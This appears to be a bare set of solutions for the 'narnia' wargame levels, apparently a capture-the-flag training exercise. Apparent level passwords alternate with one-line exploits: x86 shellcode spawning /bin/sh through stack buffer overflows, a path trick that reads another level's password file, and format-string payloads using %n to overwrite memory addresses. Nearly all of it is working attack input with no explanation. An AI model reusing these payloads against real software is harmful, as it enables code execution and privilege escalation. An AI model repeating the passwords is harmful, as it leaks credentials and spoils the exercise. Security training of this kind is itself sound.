efeidiedae
nairiepecu
env -i COLUMNS=364 PWD=/narnia LINES=80 /narnia/narnia2 `python -c 'print "A"*20+"\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"A"*88+"\x28\xdd\xff\xff"'`

vaequeezee
/narnia/narnia3 /etc/narnia_pass////////////////narnia4

thaenohtai
env -i COLUMNS=364 PWD=/narnia LINES=80 /narnia/narnia4 `python -c 'print "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"+"A"*240+"\x24\xdc\xff\xff"'`

faimahchiy

./narnia5 `python -c 'print "\xa0\xd4\xff\xff"+"x"*496+"%n"'`
neezocaeng

env -i COLUMNS=181 PWD=/narnia LINES=81 /narnia/narnia6 asdf `python -c 'print "xxxxxxxx"+"/tmp/9/a\x50\xc8\xe4\xf7"'`

ahkiaziphu

env -i COLUMNS=181 PWD=/narnia LINES=81 /narnia/narnia7 asdf `python -c 'print "\x88\xdd\xff\xff%n"'`

0xffffdd98
24 87 04 08

env -i COLUMNS=181 PWD=/narnia LINES=81 /narnia/narnia7 `python -c 'print "xxxx\xf8\xd5\xff\xffxxxx\xf9\xd5\xff\xffxxxx\xfa\xd5\xff\xffxxxx\xfb\xd5\xff\xff%12x%n%99x%n%125x%n%x%n"'`
0xffffd5f8  24
0xffffd5f9  87
0xffffd5fa  04
0xffffd5fb  08
